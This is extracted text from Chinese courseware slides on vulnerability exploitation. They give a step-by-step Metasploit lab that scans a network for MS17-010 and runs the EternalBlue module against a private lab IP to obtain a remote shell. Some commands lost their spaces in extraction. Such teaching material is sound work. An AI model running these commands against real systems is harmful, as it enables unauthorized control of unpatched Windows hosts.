《信息安全技术基础》课件 3.2漏洞攻击和利用技术.pptx

第三单元;主要内容;任务2漏洞攻击和利用技术;任务2漏洞攻击和利用技术;任务2漏洞攻击和利用技术;本次任务通过Metasploit工具（注：本任务使用的metaspolit是kaili系统自带的版本，kaili系统要求是2017以后的版本）实现对具有微软ms17-010漏洞的计算机实行攻击，并获取该计算机管理权限。

步骤1：启动Metasploit，如下图3-5所示。

;步骤2：搜索ms17-010的利用工具，输入命令searchms17_010，如下图3-6所示。;步骤3：首先检测网段内存在漏洞的主机系统

（1）加载漏洞扫描辅助模块，输入命令：

useauxiliary/scanner/smb/smb_ms17_010//调用scannersmb_ms17_010

模块进行扫描，并使用showoptions查看设置参数，如下图3-7所示。

;（2）设置要扫描的IP如下图所示。;（4）使用exploit进行测试（利用测试，显示绿色的+，以及提示信息，即为存在漏洞主机）。如下图所示。;步骤4：漏洞利用

（1）调用ms17_010的漏洞利用模块。输入命令：

useexploit/windows/smb/ms17_010_eternalblue?，如下图3-11所示。

;（2）使用showoptions查看参数设置，如下图3-12所示。;（3）设置被攻击的主机的IP地址，输入命令：setRHOST192.168.198.136。;（4）开始漏洞利用，输入命令:exploit，成功后可以看到顺利的拿到了目标的shell，如下图所示。;任务2漏洞攻击和利用技术